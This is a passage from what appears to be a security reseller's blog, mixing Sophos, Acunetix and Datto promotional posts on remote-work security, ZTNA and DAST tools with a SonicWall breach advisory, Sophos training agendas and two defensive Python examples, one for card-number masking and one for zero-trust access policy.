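    redacted = text
    for start, end, digits in reversed(hits):   # right to left keeps offsets valid
        redacted = redacted[:start] + mask_pan(digits) + redacted[end:]
    return {"action": action, "findings": len(hits), "text": redacted}


# Constructed outbound e-mail body: two real-format test card numbers, an
# order reference that looks like a PAN but fails Luhn, and a phone number.
SAMPLE_MESSAGE = (
    "Hi, please charge card 4111 1111 1111 1111 (exp 12/24) for order "
    "1234 5678 9012 3456. Backup card: 5500-0000-0000-0004. "
    "Call me on 555-0100 if anything fails."
)

if __name__ == "__main__":
    print(inspect_message(SAMPLE_MESSAGE, action="mask"))
```

The checksum is what keeps the false-positive rate down: the order reference is a 16-digit string in card format but fails Luhn, so it is left alone, while both test card numbers are masked to their last four digits. A production DLP engine would add further identifiers (national IDs, IBANs) and decode attachments, but the decision flow is the same.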

7. Classify Your Data to Protect It

A very common mistake in data protection strategies is to treat all data the same way. Contrary to what may be believed, this complicates the processes and reduces their effectiveness. A salary listing is not the same as a marketing file or an annual sales estimate, so effective data management and protection begins with good data classification. You must know what types of data your company has, where it is hosted, and what level of criticality and business value it has in order to determine which data should be protected, how, and who should have access to and control over it.

8. Create and Implement a Cybersecurity Program

If you do not have one in place yet, you should create and implement a cybersecurity program that will help you to not only protect your data, but any company assets that could be compromised by hackers.

A security program essentially establishes what must be done to understand particular assets (information and systems), what must be in place to take care of them, and how to act in case of an attack. It is very important that this program involves all the employees of the organization and is explained to them in a language that everyone can understand (beyond the technical details).

In addition to the specific recommendations that we have already made in the previous points, depending on the industry in which your company operates or the criticality of your information, it may be necessary to perform pen testing of your environment.

9. Try the Data Security Solutions You Want to Implement for Free

In times when budgets have been greatly reduced and resources diminished due to the pandemic, software purchases must be made meticulously. For this reason, we recommend that before deciding on data security software you download a free trial version that allows you to learn how to use it and analyze whether it is the right one for you. You can also request a demo tailored to your company’s needs so that the software provider can help you analyze whether it meets the functionality you are looking for and your expectations.

10. Trust in a Comprehensive Cybersecurity Provider

One of the best tips to improve the security of an organization is to use compatible solutions, whose functionalities integrate well with each other. This will avoid headaches for IT teams and ensures that they can be implemented without stopping the business.

The best way to ensure this is to trust a comprehensive provider of cybersecurity solutions that is capable of offering all the solutions you need for your specific case. Furthermore, for companies in Latin America and Spain, we know that it is very important to have a local presence and Spanish-speaking support, without intermediaries.

Source: Boldon James


26 Feb

It’s easy to pinpoint when the global health crisis forever changed the security landscape. All of a sudden, at exactly the same time, the workforces of entire organizations went remote. And so did the technology teams supporting them.

It’s clear that most organizations won’t be returning to office-based working on the same level as before. And just as users are increasingly dispersed, so are the resources they use: on servers in the office; in cloud-based applications like Office 365 or Salesforce; and in private or public cloud environments on Amazon Web Services (AWS) and Microsoft Azure.

IT teams are being tasked to protect what we’re calling “the Anywhere Organization”: where people can work securely from any location, using any device, and accessing resources wherever they’re held.

3 steps to protect the Anywhere Organization

You wouldn’t bolt your front door but leave your back door unlocked and assume that your home is secure. The same goes for cybersecurity. You need to protect all locations, devices, and resources.

Secure connectivity

Whether employees are logging in from home office setups, at a corporate office, visiting a client, or using a hotel Wi-Fi halfway across the globe, they need to be able to connect securely.

VPN is a tried and trusted approach that has enabled users to connect remotely for years. It was a savior at the beginning of the pandemic, allowing organizations to quickly pivot to secure remote working in just days.

Many organizations are starting to want more than VPN was ever designed to deliver. Zero Trust Network Access (ZTNA) is a great alternative to remote access VPN. It enables users to easily connect to corporate resources from any location while also enhancing your security by constantly verifying the user and validating the health and compliance of the device.

Protect all devices

For today’s Anywhere Organization, protection must work on any device or platform your employees may need to use: desktops, laptops, and mobile devices running Windows, macOS, Linux, Android, Chromebook, and iOS.

The most devastating cyber threats involve human-led attacks, often exploiting legitimate tools and processes such as PowerShell. Hands-on, live hacking enables attackers to bypass security products and protocols by modifying their tactics, techniques, and procedures (TTPs).

Stopping these human-led attacks requires human-led threat hunting. Either look for an EDR (Endpoint Detection and Response) solution that gives you the tools you need to perform threat hunts from the same console used to manage your endpoint protection, or bring in the experts via a Managed Detection and Response service.

Secure all resources

When it comes to securing the Anywhere Organization, it’s essential to protect the data and workloads your people need to use, while simultaneously securing the networks they’re on.

You may be running servers on-premises, consuming cloud-based applications, or hosting resources in private and public cloud environments on AWS, Azure, or GCP. Most likely, you’re doing all of the above. Whatever your unique situation, you need:

  • Next-gen server protection for your cloud, on-premises, or hybrid workload environments.
  • Powerful gateway protection with a firewall that secures cloud-based and on-premises environments.

Time to make lemonade

An old adage says, “When life gives you lemons, make lemonade.” And that’s pretty much what the corporate enterprise is doing by adopting the Anywhere Organization trend.

It’s proving out that remote working is a win-win for companies and staff alike in terms of greater productivity and reduced operational costs.

Sophos can help you with all three pillars of secure remote working: secure connectivity, protected devices, and secure resources.

Plus we also make life easier for busy (and often remote) IT teams too: all Sophos protection can be managed through our Sophos Central platform. In fact, customers running a Sophos security system consistently report a 50% reduction in IT workload.

To learn more about how Sophos can help you with secure remote working read our solution brief, Securing the Anywhere Organization.

Source: Sophos

23 Feb

Network security has never been enough to keep bad actors from accessing sensitive data because most breaches occur at the application level. Invicti’s dynamic application security testing (DAST) tools provide the automation, visibility, and scale required to effectively secure web applications.

Invicti is an international web application security software company with a mission to make the internet a safer place; it has brought together Netsparker and Acunetix, two brands that identify web vulnerabilities.

Meet the tools 


Acunetix 

Acunetix is a vulnerability assessment and management solution, designed to be part of any enterprise environment by providing multiple integrations as well as options to integrate within custom contexts. Acunetix is renowned for its high-performance engine (written in C++) and its very low rate of false positives. It is available for Microsoft Windows, Linux, and macOS as well as an online (cloud) solution. The scanner uses a web interface and two unique technologies that help you discover more vulnerabilities: AcuMonitor and AcuSensor (which helps you locate the vulnerability in the source code). In addition to an Acunetix scan, you can and should follow up with further manual tests using command-line and GUI-based penetration testing tools.

Advantages

  • An easy-to-use, multi-user tool focused on SME/SMB
  • Built for efficiency and ease of use
  • Well suited for small security teams that do not have dedicated application security resources
  • Enables flexible integrations and provides a comprehensive API
  • Available on Windows, Linux, macOS and in the cloud


Netsparker 

Netsparker finds and reports web application vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) on all types of web applications, regardless of the platform and technology they are built with. Netsparker’s unique and dead accurate Proof-Based Scanning Technology does not just report vulnerabilities; it also produces a proof of concept to confirm they are not false positives, freeing you from having to double-check the identified vulnerabilities.

Available as a Windows application (Netsparker Desktop) or as a cloud-based solution (Netsparker Cloud), it is the ultimate, enterprise-class web application security solution.

Advantages 

  • A Comprehensive multi-team solution geared towards enterprises
  • Built to scale
  • Ideal for complex and decentralized IT infrastructures
  • Can be deployed in the cloud, on-premises, or in any combination
  • Helps break down silos between the security and development teams

Focusing on network security leaves vulnerabilities

3 out of 4 security breaches occur at the application level but investments in application security continue to pale compared to network security. 

The risks keep growing

The web has gone from 50 million sites in 2005 to over 1.8 billion (and growing) in 2020. Keeping up with this exponential growth and risk is important to protect your organization and customer data.

All applications will be web applications

Businesses worldwide continue moving to the cloud. Analysts predict that by 2025, cloud products will make up more than 50% of the software market. By 2032, this figure may exceed 90%.

What to do? Be safe!

The best of breed DAST solutions help you to:

  • Automate mimicked real-world attacks to identify, prioritize, and validate security vulnerabilities in running applications.
  • Eliminate the reliance on time-consuming manual penetration testing and the dependency on bug bounty programs.
  • Reduce friction between security and development teams and incorporate security into the development process.

Invicti delivers safety

Based in Austin, Texas, Invicti Security specializes in web application security, serving organizations across the world. Invicti was founded in 2018 by bringing together Netsparker and Acunetix, two brands that identify web vulnerabilities to prevent costly data breaches and other security incidents. Netsparker was the first web application security solution to deliver automatic verification of vulnerabilities with its proprietary Proof-Based Scanning™ technology. This best-in-class web application security solution identifies vulnerabilities from the early stages of application development through production. Known for its ease of use, speed and accuracy, Acunetix is a global web security leader and the first-ever automated web application security scanner.

14 Feb

The branch office of one

Prior to the pandemic, there was already a shift in networking underway, with an increasing percentage of the workforce beginning to work from home – at least part-time. This trend has dramatically accelerated over the last year, with the vast majority of organizations either mandating their employees work from home, or strongly encouraging it.

This has transformed many organizations almost overnight into a highly-distributed model with hundreds, if not thousands, of one-person branch offices. The “branch office of one” has become the new normal for many organizations.

This massive shift has created a similarly massive challenge for many IT organizations, who have been scrambling to implement VPN access for their remote workers. As just one example, usage of our Sophos Connect VPN client with XG Firewall has shot up more than 10x to over 1.4 million active clients in recent months.

And while VPN technology has been a savior and has served us well, it was never designed for this new world. VPN can be difficult to deploy and to enroll new staff in, it can be challenging for end users and creates unnecessary friction, and it does not provide the kind of granular security that most organizations require.

Gartner’s recent report, Solving the Challenges of Modern Remote Access, also highlights the challenges with VPN: licensing, efficiency, relevancy, and suitability for the task.

Protecting your data

If it wasn’t enough that IT organizations are grappling with this massive shift in remote working, the whole industry has come under siege by bad actors and hackers attempting to take advantage of the current situation with increasing attacks on corporate systems and data. The latest Sophos 2021 Threat Report provides an excellent look at how cybercriminals have upped their game.

With a massive collection of branch offices of one and an ever-increasing need for tighter security that is transparent and frictionless, what are the options?

We’re actively working to get Sophos ZTNA, or zero trust network access, into your hands as fast as possible. To help overcome some of the challenges you’re facing with remote workers, it provides a simpler, better, more secure solution to connect your users to important applications and data.

Zero trust network access

ZTNA is founded on the principle of zero trust and is all about verifying the user. It typically leverages multi-factor authentication to prevent stolen credentials from being a source of compromise, then validates the health and compliance of the device to ensure it’s enrolled, up to date, and properly protected. ZTNA then uses that information to make policy-based decisions to determine access and privilege to important networked applications.
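A default-deny access decision of the kind the paragraph describes, as an added example that is not Sophos ZTNA code: per-application policies that check MFA, device enrolment and health, and group entitlement, with the all-or-nothing VPN model alongside for contrast. The users, devices, applications, field names and thresholds are assumptions for the demo.

```python
"""Added example (not Sophos ZTNA code): a small default-deny access policy
engine of the kind ZTNA products implement, next to the all-or-nothing network
access of a remote access VPN.

Every request is evaluated per application against the three things the text
describes: the verified identity (including MFA), the device's enrolment and
health, and the entitlement for that specific application. Field names,
thresholds and the sample tenant are assumptions for the demo.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    groups: frozenset
    mfa_verified: bool


@dataclass(frozen=True)
class Device:
    device_id: str
    enrolled: bool                     # managed and known to the tenant
    patch_age_days: int                # days since OS/security updates were current
    endpoint_protection_healthy: bool  # agent running, no outstanding detections


@dataclass(frozen=True)
class AppPolicy:
    app: str
    allowed_groups: frozenset
    require_mfa: bool = True
    max_patch_age_days: int = 30
    require_healthy_endpoint: bool = True


def posture_failures(device, policy):
    """Device-health checks for one app; an empty list means compliant."""
    failures = []
    if not device.enrolled:
        failures.append("device not enrolled")
    if device.patch_age_days > policy.max_patch_age_days:
        failures.append("patches older than %d days" % policy.max_patch_age_days)
    if policy.require_healthy_endpoint and not device.endpoint_protection_healthy:
        failures.append("endpoint protection unhealthy")
    return failures


def decide(user, device, policy):
    """Default deny: returns (allowed, reasons). Every check must pass."""
    reasons = []
    if policy.require_mfa and not user.mfa_verified:
        reasons.append("MFA not verified")
    if not (user.groups & policy.allowed_groups):
        reasons.append("user not entitled to " + policy.app)
    reasons.extend(posture_failures(device, policy))
    return (not reasons, reasons)


def ztna_accessible_apps(user, device, policies):
    """What a ZTNA client would be allowed to broker for this user and device."""
    return sorted(p.app for p in policies if decide(user, device, p)[0])


def vpn_reachable_apps(authenticated, policies):
    """The VPN model from the text: once authenticated and on the network,
    every application is reachable regardless of device health or entitlement."""
    return sorted(p.app for p in policies) if authenticated else []


# Constructed tenant: three applications with different sensitivity.
POLICIES = [
    AppPolicy("wiki", frozenset({"staff"}), require_mfa=False),
    AppPolicy("crm", frozenset({"sales", "finance"})),
    AppPolicy("payroll", frozenset({"finance"}), max_patch_age_days=7),
]

if __name__ == "__main__":
    alice = User("alice", frozenset({"staff", "sales"}), mfa_verified=True)
    laptop = Device("lt-01", enrolled=True, patch_age_days=3,
                    endpoint_protection_healthy=True)
    print("ZTNA:", ztna_accessible_apps(alice, laptop, POLICIES))
    print("VPN :", vpn_reachable_apps(True, POLICIES))
```

The interesting cases are the ones a VPN cannot express: a finance user on a laptop that is 20 days behind on patches still reaches the CRM but not payroll, and an unenrolled personal device reaches nothing, even with valid credentials.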

Benefits of ZTNA compared to remote access VPN

While remote access VPN continues to serve us well, ZTNA offers a number of added benefits that make it a much more compelling solution:

  • More granular control: ZTNA allows more granular control over who can access certain applications and data, minimizing lateral movement and removing implied trust. VPN is all-or-nothing: once on the network, VPN generally offers access to everything.
  • Better security: ZTNA includes device and health status in access policies to further enhance security. VPN does not consider device status, which can put application data at risk to a compromised or non-compliant device.
  • Easier to enroll staff: ZTNA is much easier to roll out and is better when it comes to enrolling new employees. VPN involves more challenging and difficult setup and deployment.
  • Transparent to users: ZTNA offers “just works” transparency to users with frictionless connection management. VPN can be difficult and prone to initiating support calls.

Overall, ZTNA offers a welcome solution to connecting the branch office of one.

Sophos ZTNA

Sophos ZTNA is a brand new cloud-delivered, cloud-managed product to easily and transparently secure your important business applications with granular controls.

Sophos ZTNA consists of three components:

  • Sophos Central provides the ultimate cloud management and reporting solution for all your Sophos products, including Sophos ZTNA. Sophos ZTNA is fully cloud-enabled, with Sophos Central providing easy deployment, granular policy management, and insightful reporting from the cloud.
  • Sophos ZTNA Gateway will be available as a virtual appliance for a variety of platforms to secure networked applications on-premise or in the public cloud. AWS and VMware ESXi support will be available initially, closely followed by support for Azure, Hyper-V, Nutanix, and others.
  • Sophos ZTNA Client provides transparent and frictionless connectivity to controlled applications for end users based on identity and device health. It is easy to deploy from Sophos Central, with an option to deploy alongside Intercept X with one click or to work standalone with any desktop AV client. It will initially support macOS and Windows, and later Linux and mobile device platforms as well.

Coming soon

The early access program (EAP) for the initial version of our ZTNA solution will kick off in the next couple of weeks, so stay tuned for additional news. I hope you will all join us in test-driving Sophos ZTNA to make it the best product it can be for launch!

Source: Sophos

9 Feb

Read the report today!

Global research and advisory firm 451 Research (part of S&P Global Market Intelligence) has published a comprehensive evaluation of Sophos Rapid Response, our cyber incident emergency response service.

451 Research calls out Sophos Rapid Response as an attractive emergency response service not just for small and midsized businesses, but also larger organizations, and highlights the fixed-fee, 45-day engagement model as “unique in a market that is known for open-ended hourly pricing models, annual retainers and, at times, delayed response.”

Incident response expertise is one of the top cybersecurity-related skillsets missing from IT teams, second only to cloud platform expertise, according to the Voice of the Enterprise (VotE): Information Security, Organizational Dynamics 2020 survey conducted by 451 Research.

Furthermore, the VotE survey found information security staffing levels in enterprises to be inadequate, with IT teams lacking the capacity to deal with the cybersecurity challenges those organizations face.

Sophos’ own research echoes these findings: 81% of IT managers say the ability to find and retain skilled IT security professionals is a major challenge to their ability to deliver IT security*.

This lack of in-house capacity and expertise is pushing many organizations to outsource their cybersecurity. Sophos Rapid Response enables IT teams to plug the gap in cybersecurity skills and resourcing by taking advantage of Sophos’ team of in-house experts.

Read 451 Research’s comprehensive review to get both an in-depth analysis of the incident response services marketplace and impartial overview of the Sophos Rapid Response service.

Every second counts during a cyberattack

Dealing with a cyberattack is a race against time: you need to stop your adversary before they can achieve their objectives. Sophos Rapid Response gets you out of the danger zone fast with our 24/7 team of remote incident responders, threat analysts, and threat hunters.

For more information on the Sophos Rapid Response service, speak to your Sophos representative or visit www.sophos.com/rapidresponse.

Source: Sophos

2

Feb

SonicWall, a cybersecurity vendor serving managed service providers (MSPs), announced on January 22 that it had been hacked.

The breach involved “highly sophisticated threat actors exploiting probable zero-day vulnerabilities on certain SonicWall secure remote access products,” according to the company’s statement.

If you’re a SonicWall partner, they’ve outlined some actions you can take to mitigate your risk if you have a product that has been compromised. However, it’s important that MSPs remember the foundations of a secure platform to protect their assets and their clients’.

  1. Ensure applications are patched and up to date. When applications are not up to date, businesses are more vulnerable. Patch software on a regular basis, or even automatically, to avoid hackers exploiting known vulnerabilities.
  2. Enable two-factor authentication. This multi-layered security approach is a vital step for MSPs looking for an easy way to better restrict access to their network, applications, and systems.
  3. Review your remote monitoring policies. Ensure your alerts are set up to keep you in the know of any potential breaches or impacted endpoints.
  4. Ensure you have a business continuity solution in place. Business continuity and disaster recovery (BCDR) tools are built to restore a device or server in the event of a security breach or disaster. When all else fails, BCDR tools enable businesses to get back up and running when the worst happens, keeping business operations intact.

Source: Datto

1

Feb

This three-day training program is designed for experienced technical professionals who want to install, configure and support the XG Firewall in production environments, and is the result of an in-depth study of Sophos' next-generation firewall. The program consists of presentations and practical workshops that reinforce the teaching content. Given the nature of the training and the varied experience of the trainees, open discussion is encouraged throughout.

Sophos XG Architect Training (3-day training) – Tuesday 16 March 2021 – Thursday 18 March 2021

Requirement 

  • XG Firewall Certified Engineer course and delta modules up to version 18.0

Recommended Knowledge

  • Knowledge of networking to a CompTIA N+ level
  • Knowledge of IT security to a CompTIA S+ level
  • Experience configuring network security devices
  • Be able to troubleshoot and resolve issues in Windows networked environments
  • Experience configuring and administering Linux/UNIX systems

Content

  • Module 1: Deployment
  • Module 2: Base firewall
  • Module 3: Network Protection
  • Module 4: Synchronized security
  • Module 5: Web server Protection
  • Module 6: Site to site connections
  • Module 7: Authentications
  • Module 8: Web Protection
  • Module 9: Wireless
  • Module 10: Remote Access
  • Module 11: High Availability
  • Module 12: Public Cloud

Certification

+ exam: Sophos XG Architect

Duration 3 days

Agenda

Trainer: Michael Eleftheroglou

Day 1 Tuesday 16 March 2021

9:30-10:45 Module 1: Deployment and Lab

  • Recall important information from Engineer courses
  • Deployment modes supported by the XG Firewall
  • Understand a range of scenarios where each deployment mode would commonly be used
  • Use built-in tools to troubleshoot issues
  • Labs    

10:45-11:00 break

11:00-13:00 Module 2: Base Firewall

  • Explain how the XG firewall can be accessed
  • Understand the types of interfaces that can be created
  • Understand the benefits of Fast Path Technology
  • Configure routing per firewall rule
  • Understand best practice for ordering firewall rules
  • Explain what a Local NAT policy is and know how to configure it

13:00-14:00 Lunch

14:00-16:00  Labs

  • Activate the Sophos XG Firewalls
  • Post installation Configuration
  • Bridge interfaces
  • Create a NAT rule to load balance access to servers
  • Create a local NAT policy
  • Configure routing using multiple WAN links
  • Configure policy-based routing for an MPLS scenario
  • Install Sophos Central

16:00-16:15 Break

16:15-17:15 Module 3: Network Protection and Lab

  • Explain what IPS is and how traffic can be offloaded to Fastpath
  • Demonstrate how to optimize workload by configuring IPS policies
  • Examine advanced Intrusion Prevention and optimize policies
  • Configure advanced DoS Protection rules
  • Demonstrate how the strict policy can be used to protect networks
  • Labs- Create Advanced DoS Rules

Day 2  Wednesday 17 March 2021 

9:30-11:00 Module 4: Synchronized Security and Labs

  • Explain how Security Heartbeat works
  • Configure Synchronized Security
  • Deploy Synchronized Security in discover and inline modes
  • Understand the advantages and disadvantages of deploying Synchronized Security in different scenarios
  • Labs
  • Configure source-based Security Heartbeat firewall rules
  • Destination based Security Heartbeat
  • Missing Security Heartbeat
  • Lateral Movement Protection

11:00-11:15 Break

11:15-13:45 Module 5: Web Server Protection and Labs

  • Explain how Web Server Protection works
  • Describe protection features for a web application
  • Configure Web Server authentication
  • Publish a web service using the Web Application Firewall
  • Use the preconfigured templates to configure Web Server Protection for common purposes
  • Configure SlowHTTP protection
  • Labs (Web Application Firewall)
  • Labs (Load balancing with Web Server Protection)
  • Labs (Web Server Authentication and path-specific routing)

13:45-14:45 Break and Lunch

14:45-17:45 Module 6: Site to site connections and Labs

  • Configure and deploy site-to-site VPNs in a wide range of environments
  • Implement IPsec NATing and failover
  • Check and modify route precedence
  • Create RED tunnels between XG Firewalls
  • Understand when to use RED
  • Labs (Create an IPsec site-to-site VPN)
  • Labs (Configure VPN network NATing)
  • Labs (Configure VPN failover)
  • Labs (Enable RED on the XG Firewall)
  • Labs (Create a RED tunnel between two XG Firewalls)
  • Labs (Configure routing for the RED tunnel)
  • Labs (Configure route-based VPN)

Day 3 Thursday 18 March 2021

9:00-10:00 Module 7: Authentications and Labs

  • Demonstrate how to configure and use RADIUS accounting
  • Deploy STAS in large and complex environments
  • Configure SATC and STAS together
  • Configure Secure LDAP and identify the different secure connections available
  • Labs (Configure an Active Directory authentication server)
  • Labs (Configure single sign-on using STAS)
  • Labs (Authenticate users over a site-to-site VPN)

10:00-11:15  Module 8: Web Protection

  • Choose the most appropriate type for web protection in different deployment scenarios
  • Enable web filtering using the DPI engine or legacy web proxy
  • Configure TLS inspection using the DPI engine or legacy web proxy
  • Labs (Install the SSL CA certificate)
  • Labs (Configure TLS inspection rules)
  • Labs (Create a custom web policy for users)

11:15-11:30 Break

11:30-12:15 Module 9: Wireless

  • Explain how Sophos Access Points are deployed and identify some common issues
  • Configure RADIUS authentication
  • Configure a mesh network

12:15-13:05 Module 10: Remote Access

  • Configure Sophos Connect and manage the configuration using Sophos Connect Admin
  • Configure an IPsec remote access VPN
  • Configure an L2TP remote access VPN for mobile devices
  • Labs (Sophos Connect)

13:05-14:25 Module 11: High Availability

  • Explain what HA is and how it operates
  • Demonstrate how to configure HA and explain the difference between quick and manual configuration
  • List the prerequisites for high availability
  • Perform troubleshooting steps and check the logs to ensure that HA is set up correctly
  • Explain the packet flow in high availability
  • Demonstrate how to disable HA
  • Labs (Create an Active-Passive cluster)
  • Labs (Disable High Availability)

14:25-15:05 Break – Lunch 

15:05-16:15 Module 12: Public Cloud and Labs

  • Deploy XG Firewall in complex network environments
  • Explain how XG Firewall processes traffic and use this information to inform the configuration
  • Configure advanced networking and protection features
  • Deploy XG Firewall on public cloud infrastructure
  • Labs (Put a service in debug mode to gather logs)
  • Labs (Retrieve log files)
  • Labs (Troubleshoot an issue from an imported configuration file)
  • Labs (Deploy an XG Firewall on Azure (simulation))

16:15  (Exams)

28

Jan

The Linux Foundation and the Laboratory for Innovation Science at Harvard recently released a Report on the 2020 Free/Open-Source Software Contributor Survey. One of the primary conclusions of this report was the fact that free/open-source software developers often have a very negative approach to security. They spend very little time resolving security issues (an average of 2.27% of their total time spent) and they express no willingness to spend more.

Some of the quotes from the survey were simply disturbing. For example, “I find the enterprise of security a soul-withering chore and a subject best left for the lawyers and process freaks. I am an application developer.” Another example: “I find security an insufferably boring procedural hindrance.”

While the report contains the authors’ strategic recommendations, here are our thoughts about what this situation means for application security and what you can do about it.

How Far and How Wide?

The original report focuses only on free/open-source software (FOSS) but we believe it is important to consider whether this is only a FOSS problem or a problem with all developers.

Based on the survey, most FOSS developers (74.87%) are employed full-time and more than half (51.65%) are specifically paid to develop FOSS. This means that FOSS is often developed by the same people who develop commercial software. We do not believe that developers change their attitude depending on whether the software they work on is free or commercial. Therefore, we believe that this bad attitude towards security extends to all developers.

We also believe that the underlying cause of this attitude is the fact that developers are either taught badly or not taught at all. Most online resources that teach programming completely skip the issue of secure coding practices. Books about programming languages rarely even mention secure coding. Schools also often treat security as an optional subject instead of a core course that should be a prerequisite to all other programming classes.

Therefore, we conclude that the results of this survey may be assumed to apply to all software developers. While in the case of commercial software some security measures may be added by the presence of dedicated security teams, “the root is still rotten”.

Secure Development? Not Likely!

While 86.3% of the respondents of the survey received formal development training, only 39.8% stated that they have formal training in developing secure software. This means that half the developers were taught badly.

Another shock comes from the response to the following question: “When developing software, what are your main sources for security best practices?”. It turns out that only 10.73% learned such best practices from formal classes and courses and 15.51% from corporate training. Nearly half the developers use online articles/blogs (46.54%) and forums (50.66%) as their primary source of information on best practices, which again shows the horrid state of education and the lack of resources about secure coding. And while we at Acunetix pride ourselves on filling the gap and being the teachers (thanks to our articles that explain how vulnerabilities work and how to avoid them), we would much rather have developers learn first from sources that are more reliable than a search engine.

Last but not least, the survey results show that free/open-source software is usually released with no security testing at all. While 36.63% use a SAST tool to scan FOSS source code, only 15.87% use a DAST tool to test applications. This situation is probably better in the case of commercial software because security teams usually introduce SAST/DAST into the SDLC.

Why the Bad Attitude?

If your application developers have a bad attitude towards security, it is not only due to their education. It may also be because of your business organization, which causes them to feel that they’re not involved in security at all.

Developers don’t feel responsible for security primarily due to the existence of dedicated security teams. If security personnel work in separate organizational units, the developers think that security is not their problem and expect the security researchers to take care of it instead.

Developers also don’t feel responsible because in a traditional organization they rarely are expected to fix their own security-related mistakes. A typical developer writes a piece of code, gets a code review from another developer (probably just as clueless about security), and then forgets about it. Later, a security researcher finds a vulnerability and creates a ticket to fix it. This ticket is assigned to the first available developer – usually not the one who originally introduced the vulnerability.

Such an organization promotes the lack of responsibility for security and fuels negative feelings between developers and security teams. They may view one another as “the ones that cause problems” – and this is what you must aim to change first.

Automation as a Solution

Automating the process of finding and reporting security vulnerabilities as early as possible solves this problem. First of all, errors are reported by a piece of software, not a human – therefore there is no other person to blame. Secondly, the error is reported immediately, usually after the first build attempt, and the build fails, so the developer must fix their own mistake right away. And thirdly, every time the developer is forced to fix their own error, they learn a little more about how to write secure code and how important it is.

The only problem that remains is finding software that can be trusted with this task. Unfortunately, the limited capabilities of SAST/DAST software have been the cause of many failures in the past, and this is why many developers do not want to use a SAST or DAST tool.

SAST tools point to potential problems but they report quite a few false positives – the developer spends a lot of time researching something that turns out not to be a vulnerability at all. In the end, developers stop trusting the tool and start hating it. On the other hand, DAST tools report fewer false positives but often don’t provide enough information for the developer to be sure where the vulnerability is and what it can lead to.

Acunetix helps solve such problems. The advantage is that, in the case of the most serious vulnerabilities, Acunetix provides proof of the vulnerability. For example, the developer may receive a report that their code exposed sensitive files from the server – including the content of these sensitive files as evidence.

Conclusions

The most worrying conclusion from this article is that most free/open-source software is inherently insecure and if you want to feel safe using it, you need to do regular security testing yourself.

Another worrying conclusion is that people who should be your first line of defense in IT security are not educated about security and have a bad attitude toward it. This is not something that is going to be easy or quick to change.

Long-term strategic resolutions are needed to solve these major problems and simply implementing an automated solution cannot be perceived as a magic wand. However, if you introduce a reliable automated testing solution such as Acunetix into your DevSecOps SDLC at the earliest stage possible, you will ensure that your software is safe and you will teach your own developers that they need to take responsibility for the security of their code.

Source: Acunetix

27

Jan

This course is designed for technical professionals who will be supporting Sophos Central and provides an overview of how to troubleshoot the product.

Sophos Central Technician Training (2-day training) – Tuesday 2 March 2021 – Wednesday 3 March 2021

The course is expected to take 1 ½ days (10 hours) to complete, of which approximately half will be spent on the practical exercises. 

On completion of this course, trainees will be able to:

  • Understand the support tools required to investigate common issues
  • Identify common issues when reported
  • Perform appropriate troubleshooting steps

Prerequisites 

Prior to taking this course you should:

  • Have completed and passed the Sophos Central Certified Engineer course
  • This course uses Windows tools and utilities as part of the troubleshooting process. Students should be comfortable working with the following:
      • Windows Administrator command prompt
      • Control Panel settings
      • File and folder permissions
      • Windows Services (services.msc)
      • Registry Editor (regedit.exe)
      • Windows Firewall with Advanced Security
      • Active Directory Users and Computers
      • Active Directory Group Policies

Certification

To become a Sophos Certified Technician, trainees must take and pass an online assessment. The assessment tests their knowledge of both the presented and practical content. The pass mark for the assessment is 80% and is limited to 3 attempts.

Lab Environment

Each student will be provided with a pre-configured environment that simulates a company network with two sites, a head office and a branch office, and contains Windows Servers, a Windows Desktop and three XG Firewalls.

Content

  • Module 1: Introduction to Troubleshooting Sophos Central
  • Module 2: Client Installation
  • Module 3: Active Directory Synchronization
  • Module 4: Updating
  • Module 5: Policies
  • Module 6: Infection and Detection
  • Module 7: Threat Response

Certification

+ exam: Sophos Central Technician

Duration 1 1/2 days 

Agenda

Trainer: Michael Eleftheroglou

Day 1 Tuesday 2 March 2021 

9:30-10:35 Module 1: Introduction to Troubleshooting Sophos Central

  • Troubleshooting process
  • Alerts and logins in Sophos Central
  • Sophos Tools
  • Windows Tools
  • Client Log Files
  • Labs (40 mins)
  • Lab Preparation
  • Install Server Protection
  • Install and Configure AD Sync
  • Deploy an Update Cache and Message Relay

10:35-12:40 Module 2: Client Installation

  • Installation Overview

  • Active Directory Group Policy Deployment Failure
  • Download Failure
  • Competitor Removal Tool
  • Package Installation Failure
  • Labs (75 mins)
  • Troubleshoot CRT Issues
  • Uninstall a Deleted Endpoint
  • Customize the Competitor Removal Tool
  • Troubleshoot Deployment using a Startup Script
  • Troubleshoot Failure to Download the Installer
  • Troubleshoot Package Installation Failure

12:40-13:20 Lunch

13:20-14:30  Module 3: Active Directory Synchronization

  • Active Directory Synchronization Overview
  • Windows Password Changed
  • Central Password Changed
  • Unable to Connect
  • Users No Longer Being Synced
  • Verifying Filters
  • Labs (45 mins)
  • Troubleshoot Synchronization Failure
  • Troubleshoot Connection Errors for Synchronization
  • Troubleshoot Groups Not Synchronizing
  • Troubleshoot a Missing User

14:30-15:45  Module 4: Updating

Updating (30 mins)

  • Updating Overview
  • Techniques for Troubleshooting
  • Disk Space and Permissions Problems
  • Name Resolution
  • Sophos Central
  • Client Firewall
  • Network Firewall
  • Labs (45 mins)
  • Investigate the Current Configuration
  • Simulate Failure of the Update Cache Server
  • Modify Proxy Settings
  • Modify Firewall Settings

15:45-16:00 Break  

16:00-17:05 Module 5: Policies

  • Policies Overview
  • Management Communication
  • Message Relays
  • Troubleshooting Connectivity
  • Client Deleted from Central
  • Labs (45 mins)
  • Establish the Current Configuration for Management Communication
  • Configure Web Control policies and Global Settings
  • Configure Server Groups and Policies

Day 2  Wednesday 3 March 2021 

9:30-10:45 Module 6: Infection and Detection

  • Cleanup
  • Quarantine
  • False positives
  • Labs (30 mins)
  • Release a File from SafeStore
  • View File Information in EndPoint Self Help
  • Use the Source of Infection Tool

10:45-12:00 Module 7 Threat Response

  • Endpoint Detection and Response
  • How to read a threat case
  • Search for threats
  • Detection scenarios
  • How to find help from Sophos.
  • Labs (30 mins)
  • Generate and Analyze Threat Cases
  • Create and View a Forensic Snapshot

27

Jan

This course is designed for technical professionals who will be supporting Sophos XG Firewall and provides an overview of how to troubleshoot the product.

Sophos XG Technician Training (2-day training) – Tuesday 23 February 2021 – Wednesday 24 February 2021

The course is expected to take 2 days (16 hours) to complete, of which approximately 4 hours will be spent on the practical exercises.

On completion of this course, trainees will be able to:

  • Apply the troubleshooting process to issues
  • Use the tools available on the XG Firewall to gather information and investigate issues
  • Locate and read log files on the XG Firewall
  • Identify and resolve common issues

Prerequisites

Prior to taking this training, you should:

